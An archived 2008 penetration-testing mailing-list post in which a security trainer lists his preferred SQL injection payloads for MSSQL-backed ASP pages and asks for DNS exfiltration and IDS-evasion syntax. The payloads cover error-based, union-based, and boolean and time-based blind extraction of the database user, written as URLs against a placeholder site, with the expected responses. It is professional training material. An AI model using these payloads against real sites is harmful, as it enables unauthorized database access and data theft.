Home page logo
/

pen-test logo Penetration Testing mailing list archives

SQL Injection Techniques (favorite syntaxes)...help requested...updated
From: Joseph McCray <joe () learnsecurityonline com>
Date: Fri, 13 Jun 2008 18:41:43 -0400

Hey everybody, I'm working on a few projects related to SQL Injection
and trying to kill a few birds with 1 stone. 

I'm curious what are your favorite methods for identifying and
exploiting SQL Injection. I'm looking for example syntax here that
you've found has worked well for you in the past.


Here are a few snippets of techniques I like to use, I'm looking for
example syntax for data exfiltration via DNS, and IDS Evasion with SQL
Injection.


                Error-Based
#####################################################
Error-Based SQL Injection Syntax for extracting the USER

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--

Syntax error converting the nvarchar value '[DB USER]' to a column of
data type int.



                Union-Based
#####################################################
Union-Based SQL Injection Syntax for extracting the USER

http://[site]/page.asp?id=1 UNION SELECT ALL 1--

All queries in an SQL statement containing a UNION operator must have an
equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--

All queries in an SQL statement containing a UNION operator must have an
equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--

All queries in an SQL statement containing a UNION operator must have an
equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--

NO ERROR

http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--


                Traditional Blind
#####################################################
D  - 1st Character
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 1, 1)) > 97
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 1, 1)) > 98
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 1, 1)) > 99
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 1, 1)) > 100


B - 2nd Character
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 2, 1)) > 97
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 2, 1)) > 98


O - 3rd Character
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 97
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 98
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 99
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 100
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 101
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 102
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 103
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 104
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 105
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 106
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 107
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 108
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 109
http://[site]/page.asp?id=1 AND ASCII(SUBSTRING((SYSTEM_USER), 3, 1)) > 110



                Time-Based Blind
#####################################################
Blind SQL Injection Syntax for extracting the USER

3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
(+10 seconds)

D  - 1st Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98)
WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99)
WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--
(+10 seconds)
 
B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
 
O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97)
WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'--
(+10 seconds)
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--
(+10 seconds)
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF
(ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
(+10 seconds)

Database User = DBO


                What syntaxes I'm looking for
#####################################################
- Exfiltration via DNS example syntax
- IDS Evasion syntax
- Anything you think I may have forgotten above (yes I know I haven't listed MySQL and Oracle but I am working on those 
as well. If you have example syntax for MySQL/Oracle please send them my way.



-- 
Joe McCray
Toll Free:  1-866-892-2132
Email:      joe () learnsecurityonline com
Web:        https://www.learnsecurityonline.com


Learn Security Online, Inc.

* Security Games        * Simulators
* Challenge Servers     * Courses
* Hacking Competitions  * Hacklab Access

"The only thing worse than training good employees and losing them 
is NOT training your employees and keeping them." 

        - Zig Ziglar

Attachment: signature.asc
Description: This is a digitally signed message part


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault